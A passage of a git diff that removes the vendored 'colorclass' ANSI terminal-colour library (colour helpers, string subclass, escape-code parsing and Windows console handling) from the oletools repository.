- return BASE_CODES['magenta' if ANSICodeMapping.LIGHT_BACKGROUND else 'himagenta']
-
- @property
- def autocyan(self):
- """Return automatic cyan foreground color depending on background color."""
- return BASE_CODES['cyan' if ANSICodeMapping.LIGHT_BACKGROUND else 'hicyan']
-
- @property
- def autowhite(self):
- """Return automatic white foreground color depending on background color."""
- return BASE_CODES['white' if ANSICodeMapping.LIGHT_BACKGROUND else 'hiwhite']
-
- @property
- def autobgblack(self):
- """Return automatic black background color depending on background color."""
- return BASE_CODES['bgblack' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgblack']
-
- @property
- def autobgred(self):
- """Return automatic red background color depending on background color."""
- return BASE_CODES['bgred' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgred']
-
- @property
- def autobggreen(self):
- """Return automatic green background color depending on background color."""
- return BASE_CODES['bggreen' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibggreen']
-
- @property
- def autobgyellow(self):
- """Return automatic yellow background color depending on background color."""
- return BASE_CODES['bgyellow' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgyellow']
-
- @property
- def autobgblue(self):
- """Return automatic blue background color depending on background color."""
- return BASE_CODES['bgblue' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgblue']
-
- @property
- def autobgmagenta(self):
- """Return automatic magenta background color depending on background color."""
- return BASE_CODES['bgmagenta' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgmagenta']
-
- @property
- def autobgcyan(self):
- """Return automatic cyan background color depending on background color."""
- return BASE_CODES['bgcyan' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgcyan']
-
- @property
- def autobgwhite(self):
- """Return automatic white background color depending on background color."""
- return BASE_CODES['bgwhite' if ANSICodeMapping.LIGHT_BACKGROUND else 'hibgwhite']
-
-
-def list_tags():
- """List the available tags.
-
- :return: List of 4-item tuples: opening tag, closing tag, main ansi value, closing ansi value.
- :rtype: list
- """
- # Build reverse dictionary. Keys are closing tags, values are [closing ansi, opening tag, opening ansi].
- reverse_dict = dict()
- for tag, ansi in sorted(BASE_CODES.items()):
- if tag.startswith('/'):
- reverse_dict[tag] = [ansi, None, None]
- else:
- reverse_dict['/' + tag][1:] = [tag, ansi]
-
- # Collapse
- four_item_tuples = [(v[1], k, v[2], v[0]) for k, v in reverse_dict.items()]
-
- # Sort.
- def sorter(four_item):
- """Sort /all /fg /bg first, then b i u flash, then auto colors, then dark colors, finally light colors.
-
- :param iter four_item: [opening tag, closing tag, main ansi value, closing ansi value]
-
- :return Sorting weight.
- :rtype: int
- """
- if not four_item[2]: # /all /fg /bg
- return four_item[3] - 200
- if four_item[2] < 10 or four_item[0].startswith('auto'): # b f i u or auto colors
- return four_item[2] - 100
- return four_item[2]
- four_item_tuples.sort(key=sorter)
-
- return four_item_tuples
diff --git a/oletools/thirdparty/colorclass/color.py b/oletools/thirdparty/colorclass/color.py
deleted file mode 100644
index 2849d06b..00000000
--- a/oletools/thirdparty/colorclass/color.py
+++ /dev/null
@@ -1,220 +0,0 @@
-"""Color class used by library users."""
-
-from colorclass.core import ColorStr
-
-
-class Color(ColorStr):
- """Unicode (str in Python3) subclass with ANSI terminal text color support.
-
- Example syntax: Color('{red}Sample Text{/red}')
-
- Example without parsing logic: Color('{red}Sample Text{/red}', keep_tags=True)
-
- For a list of codes, call: colorclass.list_tags()
- """
-
- @classmethod
- def colorize(cls, color, string, auto=False):
- """Color-code entire string using specified color.
-
- :param str color: Color of string.
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- tag = '{0}{1}'.format('auto' if auto else '', color)
- return cls('{%s}%s{/%s}' % (tag, string, tag))
-
- @classmethod
- def black(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('black', string, auto=auto)
-
- @classmethod
- def bgblack(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgblack', string, auto=auto)
-
- @classmethod
- def red(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('red', string, auto=auto)
-
- @classmethod
- def bgred(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgred', string, auto=auto)
-
- @classmethod
- def green(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('green', string, auto=auto)
-
- @classmethod
- def bggreen(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bggreen', string, auto=auto)
-
- @classmethod
- def yellow(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('yellow', string, auto=auto)
-
- @classmethod
- def bgyellow(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgyellow', string, auto=auto)
-
- @classmethod
- def blue(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('blue', string, auto=auto)
-
- @classmethod
- def bgblue(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgblue', string, auto=auto)
-
- @classmethod
- def magenta(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('magenta', string, auto=auto)
-
- @classmethod
- def bgmagenta(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgmagenta', string, auto=auto)
-
- @classmethod
- def cyan(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('cyan', string, auto=auto)
-
- @classmethod
- def bgcyan(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgcyan', string, auto=auto)
-
- @classmethod
- def white(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('white', string, auto=auto)
-
- @classmethod
- def bgwhite(cls, string, auto=False):
- """Color-code entire string.
-
- :param str string: String to colorize.
- :param bool auto: Enable auto-color (dark/light terminal).
-
- :return: Class instance for colorized string.
- :rtype: Color
- """
- return cls.colorize('bgwhite', string, auto=auto)
diff --git a/oletools/thirdparty/colorclass/core.py b/oletools/thirdparty/colorclass/core.py
deleted file mode 100644
index 481bb405..00000000
--- a/oletools/thirdparty/colorclass/core.py
+++ /dev/null
@@ -1,342 +0,0 @@
-"""String subclass that handles ANSI color codes."""
-
-from colorclass.codes import ANSICodeMapping
-from colorclass.parse import parse_input, RE_SPLIT
-from colorclass.search import build_color_index, find_char_color
-
-PARENT_CLASS = type(u'')
-
-
-def apply_text(incoming, func):
- """Call `func` on text portions of incoming color string.
-
- :param iter incoming: Incoming string/ColorStr/string-like object to iterate.
- :param func: Function to call with string portion as first and only parameter.
-
- :return: Modified string, same class type as incoming string.
- """
- split = RE_SPLIT.split(incoming)
- for i, item in enumerate(split):
- if not item or RE_SPLIT.match(item):
- continue
- split[i] = func(item)
- return incoming.__class__().join(split)
-
-
-class ColorBytes(bytes):
- """Str (bytes in Python3) subclass, .decode() overridden to return unicode (str in Python3) subclass instance."""
-
- def __new__(cls, *args, **kwargs):
- """Save original class so decode() returns an instance of it."""
- original_class = kwargs.pop('original_class')
- combined_args = [cls] + list(args)
- instance = bytes.__new__(*combined_args, **kwargs)
- instance.original_class = original_class
- return instance
-
- def decode(self, encoding='utf-8', errors='strict'):
- """Decode using the codec registered for encoding. Default encoding is 'utf-8'.
-
- errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors
- raise a UnicodeDecodeError. Other possible values are 'ignore' and 'replace' as well as any other name
- registered with codecs.register_error that is able to handle UnicodeDecodeErrors.
-
- :param str encoding: Codec.
- :param str errors: Error handling scheme.
- """
- original_class = getattr(self, 'original_class')
- return original_class(super(ColorBytes, self).decode(encoding, errors))
-
-
-class ColorStr(PARENT_CLASS):
- """Core color class."""
-
- def __new__(cls, *args, **kwargs):
- """Parse color markup and instantiate."""
- keep_tags = kwargs.pop('keep_tags', False)
-
- # Parse string.
- value_markup = args[0] if args else PARENT_CLASS() # e.g. '{red}test{/red}'
- value_colors, value_no_colors = parse_input(value_markup, ANSICodeMapping.DISABLE_COLORS, keep_tags)
- color_index = build_color_index(value_colors)
-
- # Instantiate.
- color_args = [cls, value_colors] + list(args[1:])
- instance = PARENT_CLASS.__new__(*color_args, **kwargs)
-
- # Add additional attributes and return.
- instance.value_colors = value_colors
- instance.value_no_colors = value_no_colors
- instance.has_colors = value_colors != value_no_colors
- instance.color_index = color_index
- return instance
-
- def __add__(self, other):
- """Concatenate."""
- return self.__class__(self.value_colors + other, keep_tags=True)
-
- def __getitem__(self, item):
- """Retrieve character."""
- try:
- color_pos = self.color_index[int(item)]
- except TypeError: # slice
- return super(ColorStr, self).__getitem__(item)
- return self.__class__(find_char_color(self.value_colors, color_pos), keep_tags=True)
-
- def __iter__(self):
- """Yield one color-coded character at a time."""
- for color_pos in self.color_index:
- yield self.__class__(find_char_color(self.value_colors, color_pos))
-
- def __len__(self):
- """Length of string without color codes (what users expect)."""
- return self.value_no_colors.__len__()
-
- def __mod__(self, other):
- """String substitution (like printf)."""
- return self.__class__(self.value_colors % other, keep_tags=True)
-
- def __mul__(self, other):
- """Multiply string."""
- return self.__class__(self.value_colors * other, keep_tags=True)
-
- def __repr__(self):
- """Representation of a class instance (like datetime.datetime.now())."""
- return '{name}({value})'.format(name=self.__class__.__name__, value=repr(self.value_colors))
-
- def capitalize(self):
- """Return a copy of the string with only its first character capitalized."""
- return apply_text(self, lambda s: s.capitalize())
-
- def center(self, width, fillchar=None):
- """Return centered in a string of length width. Padding is done using the specified fill character or space.
-
- :param int width: Length of output string.
- :param str fillchar: Use this character instead of spaces.
- """
- if fillchar is not None:
- result = self.value_no_colors.center(width, fillchar)
- else:
- result = self.value_no_colors.center(width)
- return self.__class__(result.replace(self.value_no_colors, self.value_colors), keep_tags=True)
-
- def count(self, sub, start=0, end=-1):
- """Return the number of non-overlapping occurrences of substring sub in string[start:end].
-
- Optional arguments start and end are interpreted as in slice notation.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.count(sub, start, end)
-
- def endswith(self, suffix, start=0, end=None):
- """Return True if ends with the specified suffix, False otherwise.
-
- With optional start, test beginning at that position. With optional end, stop comparing at that position.
- suffix can also be a tuple of strings to try.
-
- :param str suffix: Suffix to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- args = [suffix, start] + ([] if end is None else [end])
- return self.value_no_colors.endswith(*args)
-
- def encode(self, encoding=None, errors='strict'):
- """Encode using the codec registered for encoding. encoding defaults to the default encoding.
-
- errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors
- raise a UnicodeEncodeError. Other possible values are 'ignore', 'replace' and 'xmlcharrefreplace' as well as any
- other name registered with codecs.register_error that is able to handle UnicodeEncodeErrors.
-
- :param str encoding: Codec.
- :param str errors: Error handling scheme.
- """
- return ColorBytes(super(ColorStr, self).encode(encoding, errors), original_class=self.__class__)
-
- def decode(self, encoding=None, errors='strict'):
- """Decode using the codec registered for encoding. encoding defaults to the default encoding.
-
- errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors
- raise a UnicodeDecodeError. Other possible values are 'ignore' and 'replace' as well as any other name
- registered with codecs.register_error that is able to handle UnicodeDecodeErrors.
-
- :param str encoding: Codec.
- :param str errors: Error handling scheme.
- """
- return self.__class__(super(ColorStr, self).decode(encoding, errors), keep_tags=True)
-
- def find(self, sub, start=None, end=None):
- """Return the lowest index where substring sub is found, such that sub is contained within string[start:end].
-
- Optional arguments start and end are interpreted as in slice notation.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.find(sub, start, end)
-
- def format(self, *args, **kwargs):
- """Return a formatted version, using substitutions from args and kwargs.
-
- The substitutions are identified by braces ('{' and '}').
- """
- return self.__class__(super(ColorStr, self).format(*args, **kwargs), keep_tags=True)
-
- def index(self, sub, start=None, end=None):
- """Like S.find() but raise ValueError when the substring is not found.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.index(sub, start, end)
-
- def isalnum(self):
- """Return True if all characters in string are alphanumeric and there is at least one character in it."""
- return self.value_no_colors.isalnum()
-
- def isalpha(self):
- """Return True if all characters in string are alphabetic and there is at least one character in it."""
- return self.value_no_colors.isalpha()
-
- def isdecimal(self):
- """Return True if there are only decimal characters in string, False otherwise."""
- return self.value_no_colors.isdecimal()
-
- def isdigit(self):
- """Return True if all characters in string are digits and there is at least one character in it."""
- return self.value_no_colors.isdigit()
-
- def isnumeric(self):
- """Return True if there are only numeric characters in string, False otherwise."""
- return self.value_no_colors.isnumeric()
-
- def isspace(self):
- """Return True if all characters in string are whitespace and there is at least one character in it."""
- return self.value_no_colors.isspace()
-
- def istitle(self):
- """Return True if string is a titlecased string and there is at least one character in it.
-
- That is uppercase characters may only follow uncased characters and lowercase characters only cased ones. Return
- False otherwise.
- """
- return self.value_no_colors.istitle()
-
- def isupper(self):
- """Return True if all cased characters are uppercase and there is at least one cased character in it."""
- return self.value_no_colors.isupper()
-
- def join(self, iterable):
- """Return a string which is the concatenation of the strings in the iterable.
-
- :param iterable: Join items in this iterable.
- """
- return self.__class__(super(ColorStr, self).join(iterable), keep_tags=True)
-
- def ljust(self, width, fillchar=None):
- """Return left-justified string of length width. Padding is done using the specified fill character or space.
-
- :param int width: Length of output string.
- :param str fillchar: Use this character instead of spaces.
- """
- if fillchar is not None:
- result = self.value_no_colors.ljust(width, fillchar)
- else:
- result = self.value_no_colors.ljust(width)
- return self.__class__(result.replace(self.value_no_colors, self.value_colors), keep_tags=True)
-
- def rfind(self, sub, start=None, end=None):
- """Return the highest index where substring sub is found, such that sub is contained within string[start:end].
-
- Optional arguments start and end are interpreted as in slice notation.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.rfind(sub, start, end)
-
- def rindex(self, sub, start=None, end=None):
- """Like .rfind() but raise ValueError when the substring is not found.
-
- :param str sub: Substring to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.rindex(sub, start, end)
-
- def rjust(self, width, fillchar=None):
- """Return right-justified string of length width. Padding is done using the specified fill character or space.
-
- :param int width: Length of output string.
- :param str fillchar: Use this character instead of spaces.
- """
- if fillchar is not None:
- result = self.value_no_colors.rjust(width, fillchar)
- else:
- result = self.value_no_colors.rjust(width)
- return self.__class__(result.replace(self.value_no_colors, self.value_colors), keep_tags=True)
-
- def splitlines(self, keepends=False):
- """Return a list of the lines in the string, breaking at line boundaries.
-
- Line breaks are not included in the resulting list unless keepends is given and True.
-
- :param bool keepends: Include linebreaks.
- """
- return [self.__class__(l) for l in self.value_colors.splitlines(keepends)]
-
- def startswith(self, prefix, start=0, end=-1):
- """Return True if string starts with the specified prefix, False otherwise.
-
- With optional start, test beginning at that position. With optional end, stop comparing at that position. prefix
- can also be a tuple of strings to try.
-
- :param str prefix: Prefix to search.
- :param int start: Beginning position.
- :param int end: Stop comparison at this position.
- """
- return self.value_no_colors.startswith(prefix, start, end)
-
- def swapcase(self):
- """Return a copy of the string with uppercase characters converted to lowercase and vice versa."""
- return apply_text(self, lambda s: s.swapcase())
-
- def title(self):
- """Return a titlecased version of the string.
-
- That is words start with uppercase characters, all remaining cased characters have lowercase.
- """
- return apply_text(self, lambda s: s.title())
-
- def translate(self, table):
- """Return a copy of the string, where all characters have been mapped through the given translation table.
-
- Table must be a mapping of Unicode ordinals to Unicode ordinals, strings, or None. Unmapped characters are left
- untouched. Characters mapped to None are deleted.
-
- :param table: Translation table.
- """
- return apply_text(self, lambda s: s.translate(table))
-
- def upper(self):
- """Return a copy of the string converted to uppercase."""
- return apply_text(self, lambda s: s.upper())
-
- def zfill(self, width):
- """Pad a numeric string with zeros on the left, to fill a field of the specified width.
-
- The string is never truncated.
-
- :param int width: Length of output string.
- """
- if not self.value_no_colors:
- result = self.value_no_colors.zfill(width)
- else:
- result = self.value_colors.replace(self.value_no_colors, self.value_no_colors.zfill(width))
- return self.__class__(result, keep_tags=True)
diff --git a/oletools/thirdparty/colorclass/parse.py b/oletools/thirdparty/colorclass/parse.py
deleted file mode 100644
index 46dc28e3..00000000
--- a/oletools/thirdparty/colorclass/parse.py
+++ /dev/null
@@ -1,96 +0,0 @@
-"""Parse color markup tags into ANSI escape sequences."""
-
-import re
-
-from colorclass.codes import ANSICodeMapping, BASE_CODES
-
-CODE_GROUPS = (
- tuple(set(str(i) for i in BASE_CODES.values() if i and (40 <= i <= 49 or 100 <= i <= 109))), # bg colors
- tuple(set(str(i) for i in BASE_CODES.values() if i and (30 <= i <= 39 or 90 <= i <= 99))), # fg colors
- ('1', '22'), ('2', '22'), ('3', '23'), ('4', '24'), ('5', '25'), ('6', '26'), ('7', '27'), ('8', '28'), ('9', '29'),
-)
-RE_ANSI = re.compile(r'(\033\[([\d;]+)m)')
-RE_COMBINE = re.compile(r'\033\[([\d;]+)m\033\[([\d;]+)m')
-RE_SPLIT = re.compile(r'(\033\[[\d;]+m)')
-
-
-def prune_overridden(ansi_string):
- """Remove color codes that are rendered ineffective by subsequent codes in one escape sequence then sort codes.
-
- :param str ansi_string: Incoming ansi_string with ANSI color codes.
-
- :return: Color string with pruned color sequences.
- :rtype: str
- """
- multi_seqs = set(p for p in RE_ANSI.findall(ansi_string) if ';' in p[1]) # Sequences with multiple color codes.
-
- for escape, codes in multi_seqs:
- r_codes = list(reversed(codes.split(';')))
-
- # Nuke everything before {/all}.
- try:
- r_codes = r_codes[:r_codes.index('0') + 1]
- except ValueError:
- pass
-
- # Thin out groups.
- for group in CODE_GROUPS:
- for pos in reversed([i for i, n in enumerate(r_codes) if n in group][1:]):
- r_codes.pop(pos)
-
- # Done.
- reduced_codes = ';'.join(sorted(r_codes, key=int))
- if codes != reduced_codes:
- ansi_string = ansi_string.replace(escape, '\033[' + reduced_codes + 'm')
-
- return ansi_string
-
-
-def parse_input(tagged_string, disable_colors, keep_tags):
- """Perform the actual conversion of tags to ANSI escaped codes.
-
- Provides a version of the input without any colors for len() and other methods.
-
- :param str tagged_string: The input unicode value.
- :param bool disable_colors: Strip all colors in both outputs.
- :param bool keep_tags: Skip parsing curly bracket tags into ANSI escape sequences.
-
- :return: 2-item tuple. First item is the parsed output. Second item is a version of the input without any colors.
- :rtype: tuple
- """
- codes = ANSICodeMapping(tagged_string)
- output_colors = getattr(tagged_string, 'value_colors', tagged_string)
-
- # Convert: '{b}{red}' -> '\033[1m\033[31m'
- if not keep_tags:
- for tag, replacement in (('{' + k + '}', '' if v is None else '\033[%dm' % v) for k, v in codes.items()):
- output_colors = output_colors.replace(tag, replacement)
-
- # Strip colors.
- output_no_colors = RE_ANSI.sub('', output_colors)
- if disable_colors:
- return output_no_colors, output_no_colors
-
- # Combine: '\033[1m\033[31m' -> '\033[1;31m'
- while True:
- simplified = RE_COMBINE.sub(r'\033[\1;\2m', output_colors)
- if simplified == output_colors:
- break
- output_colors = simplified
-
- # Prune: '\033[31;32;33;34;35m' -> '\033[35m'
- output_colors = prune_overridden(output_colors)
-
- # Deduplicate: '\033[1;mT\033[1;mE\033[1;mS\033[1;mT' -> '\033[1;mTEST'
- previous_escape = None
- segments = list()
- for item in (i for i in RE_SPLIT.split(output_colors) if i):
- if RE_SPLIT.match(item):
- if item != previous_escape:
- segments.append(item)
- previous_escape = item
- else:
- segments.append(item)
- output_colors = ''.join(segments)
-
- return output_colors, output_no_colors
diff --git a/oletools/thirdparty/colorclass/search.py b/oletools/thirdparty/colorclass/search.py
deleted file mode 100644
index 555402dc..00000000
--- a/oletools/thirdparty/colorclass/search.py
+++ /dev/null
@@ -1,49 +0,0 @@
-"""Determine color of characters that may or may not be adjacent to ANSI escape sequences."""
-
-from colorclass.parse import RE_SPLIT
-
-
-def build_color_index(ansi_string):
- """Build an index between visible characters and a string with invisible color codes.
-
- :param str ansi_string: String with color codes (ANSI escape sequences).
-
- :return: Position of visible characters in color string (indexes match non-color string).
- :rtype: tuple
- """
- mapping = list()
- color_offset = 0
- for item in (i for i in RE_SPLIT.split(ansi_string) if i):
- if RE_SPLIT.match(item):
- color_offset += len(item)
- else:
- for _ in range(len(item)):
- mapping.append(color_offset)
- color_offset += 1
- return tuple(mapping)
-
-
-def find_char_color(ansi_string, pos):
- """Determine what color a character is in the string.
-
- :param str ansi_string: String with color codes (ANSI escape sequences).
- :param int pos: Position of the character in the ansi_string.
-
- :return: Character along with all surrounding color codes.
- :rtype: str
- """
- result = list()
- position = 0 # Set to None when character is found.
- for item in (i for i in RE_SPLIT.split(ansi_string) if i):
- if RE_SPLIT.match(item):
- result.append(item)
- if position is not None:
- position += len(item)
- elif position is not None:
- for char in item:
- if position == pos:
- result.append(char)
- position = None
- break
- position += 1
- return ''.join(result)
diff --git a/oletools/thirdparty/colorclass/toggles.py b/oletools/thirdparty/colorclass/toggles.py
deleted file mode 100644
index 1ba6bce1..00000000
--- a/oletools/thirdparty/colorclass/toggles.py
+++ /dev/null
@@ -1,42 +0,0 @@
-"""Convenience functions to enable/disable features."""
-
-from colorclass.codes import ANSICodeMapping
-
-
-def disable_all_colors():
- """Disable all colors. Strip any color tags or codes."""
- ANSICodeMapping.disable_all_colors()
-
-
-def enable_all_colors():
- """Enable colors."""
- ANSICodeMapping.enable_all_colors()
-
-
-def disable_if_no_tty():
- """Disable all colors if there is no TTY available.
-
- :return: True if colors are disabled, False if stderr or stdout is a TTY.
- :rtype: bool
- """
- return ANSICodeMapping.disable_if_no_tty()
-
-
-def is_enabled():
- """Are colors enabled."""
- return not ANSICodeMapping.DISABLE_COLORS
-
-
-def set_light_background():
- """Choose dark colors for all 'auto'-prefixed codes for readability on light backgrounds."""
- ANSICodeMapping.set_light_background()
-
-
-def set_dark_background():
-    """Choose light colors for all 'auto'-prefixed codes for readability on dark backgrounds."""
- ANSICodeMapping.set_dark_background()
-
-
-def is_light():
- """Are background colors for light backgrounds."""
- return ANSICodeMapping.LIGHT_BACKGROUND
diff --git a/oletools/thirdparty/colorclass/windows.py b/oletools/thirdparty/colorclass/windows.py
deleted file mode 100644
index 8f694783..00000000
--- a/oletools/thirdparty/colorclass/windows.py
+++ /dev/null
@@ -1,388 +0,0 @@
-"""Windows console screen buffer handlers."""
-
-from __future__ import print_function
-
-import atexit
-import ctypes
-import re
-import sys
-
-from colorclass.codes import ANSICodeMapping, BASE_CODES
-from colorclass.core import RE_SPLIT
-
-ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004
-INVALID_HANDLE_VALUE = -1
-IS_WINDOWS = sys.platform == 'win32'
-RE_NUMBER_SEARCH = re.compile(r'\033\[([\d;]+)m')
-STD_ERROR_HANDLE = -12
-STD_OUTPUT_HANDLE = -11
-WINDOWS_CODES = {
- '/all': -33, '/fg': -39, '/bg': -49,
-
- 'black': 0, 'red': 4, 'green': 2, 'yellow': 6, 'blue': 1, 'magenta': 5, 'cyan': 3, 'white': 7,
-
- 'bgblack': -8, 'bgred': 64, 'bggreen': 32, 'bgyellow': 96, 'bgblue': 16, 'bgmagenta': 80, 'bgcyan': 48,
- 'bgwhite': 112,
-
- 'hiblack': 8, 'hired': 12, 'higreen': 10, 'hiyellow': 14, 'hiblue': 9, 'himagenta': 13, 'hicyan': 11, 'hiwhite': 15,
-
- 'hibgblack': 128, 'hibgred': 192, 'hibggreen': 160, 'hibgyellow': 224, 'hibgblue': 144, 'hibgmagenta': 208,
- 'hibgcyan': 176, 'hibgwhite': 240,
-
- '/black': -39, '/red': -39, '/green': -39, '/yellow': -39, '/blue': -39, '/magenta': -39, '/cyan': -39,
- '/white': -39, '/hiblack': -39, '/hired': -39, '/higreen': -39, '/hiyellow': -39, '/hiblue': -39, '/himagenta': -39,
- '/hicyan': -39, '/hiwhite': -39,
-
- '/bgblack': -49, '/bgred': -49, '/bggreen': -49, '/bgyellow': -49, '/bgblue': -49, '/bgmagenta': -49,
- '/bgcyan': -49, '/bgwhite': -49, '/hibgblack': -49, '/hibgred': -49, '/hibggreen': -49, '/hibgyellow': -49,
- '/hibgblue': -49, '/hibgmagenta': -49, '/hibgcyan': -49, '/hibgwhite': -49,
-}
-
-
-class COORD(ctypes.Structure):
- """COORD structure. http://msdn.microsoft.com/en-us/library/windows/desktop/ms682119."""
-
- _fields_ = [
- ('X', ctypes.c_short),
- ('Y', ctypes.c_short),
- ]
-
-
-class SmallRECT(ctypes.Structure):
- """SMALL_RECT structure. http://msdn.microsoft.com/en-us/library/windows/desktop/ms686311."""
-
- _fields_ = [
- ('Left', ctypes.c_short),
- ('Top', ctypes.c_short),
- ('Right', ctypes.c_short),
- ('Bottom', ctypes.c_short),
- ]
-
-
-class ConsoleScreenBufferInfo(ctypes.Structure):
- """CONSOLE_SCREEN_BUFFER_INFO structure. http://msdn.microsoft.com/en-us/library/windows/desktop/ms682093."""
-
- _fields_ = [
- ('dwSize', COORD),
- ('dwCursorPosition', COORD),
- ('wAttributes', ctypes.c_ushort),
- ('srWindow', SmallRECT),
- ('dwMaximumWindowSize', COORD)
- ]
-
-
-def init_kernel32(kernel32=None):
- """Load a unique instance of WinDLL into memory, set arg/return types, and get stdout/err handles.
-
- 1. Since we are setting DLL function argument types and return types, we need to maintain our own instance of
- kernel32 to prevent overriding (or being overwritten by) user's own changes to ctypes.windll.kernel32.
- 2. While we're doing all this we might as well get the handles to STDOUT and STDERR streams.
- 3. If either stream has already been replaced set return value to INVALID_HANDLE_VALUE to indicate it shouldn't be
- replaced.
-
- :raise AttributeError: When called on a non-Windows platform.
-
- :param kernel32: Optional mock kernel32 object. For testing.
-
- :return: Loaded kernel32 instance, stderr handle (int), stdout handle (int).
- :rtype: tuple
- """
- if not kernel32:
- kernel32 = ctypes.LibraryLoader(ctypes.WinDLL).kernel32 # Load our own instance. Unique memory address.
- kernel32.GetStdHandle.argtypes = [ctypes.c_ulong]
- kernel32.GetStdHandle.restype = ctypes.c_void_p
- kernel32.GetConsoleScreenBufferInfo.argtypes = [
- ctypes.c_void_p,
- ctypes.POINTER(ConsoleScreenBufferInfo),
- ]
- kernel32.GetConsoleScreenBufferInfo.restype = ctypes.c_long
-
- # Get handles.
- if hasattr(sys.stderr, '_original_stream'):
- stderr = INVALID_HANDLE_VALUE
- else:
- stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE)
- if hasattr(sys.stdout, '_original_stream'):
- stdout = INVALID_HANDLE_VALUE
- else:
- stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
-
- return kernel32, stderr, stdout
-
-
-def get_console_info(kernel32, handle):
- """Get information about this current console window.
-
- http://msdn.microsoft.com/en-us/library/windows/desktop/ms683231
- https://code.google.com/p/colorama/issues/detail?id=47
- https://bitbucket.org/pytest-dev/py/src/4617fe46/py/_io/terminalwriter.py
-
- Windows 10 Insider since around February 2016 finally introduced support for ANSI colors. No need to replace stdout
- and stderr streams to intercept colors and issue multiple SetConsoleTextAttribute() calls for these consoles.
-
- :raise OSError: When GetConsoleScreenBufferInfo or GetConsoleMode API calls fail.
-
- :param ctypes.windll.kernel32 kernel32: Loaded kernel32 instance.
- :param int handle: stderr or stdout handle.
-
- :return: Foreground and background colors (integers) as well as native ANSI support (bool).
- :rtype: tuple
- """
- # Query Win32 API.
- csbi = ConsoleScreenBufferInfo() # Populated by GetConsoleScreenBufferInfo.
- lpcsbi = ctypes.byref(csbi)
- dword = ctypes.c_ulong() # Populated by GetConsoleMode.
- lpdword = ctypes.byref(dword)
- if not kernel32.GetConsoleScreenBufferInfo(handle, lpcsbi) or not kernel32.GetConsoleMode(handle, lpdword):
- raise ctypes.WinError()
-
- # Parse data.
- # buffer_width = int(csbi.dwSize.X - 1)
- # buffer_height = int(csbi.dwSize.Y)
- # terminal_width = int(csbi.srWindow.Right - csbi.srWindow.Left)
- # terminal_height = int(csbi.srWindow.Bottom - csbi.srWindow.Top)
- fg_color = csbi.wAttributes % 16
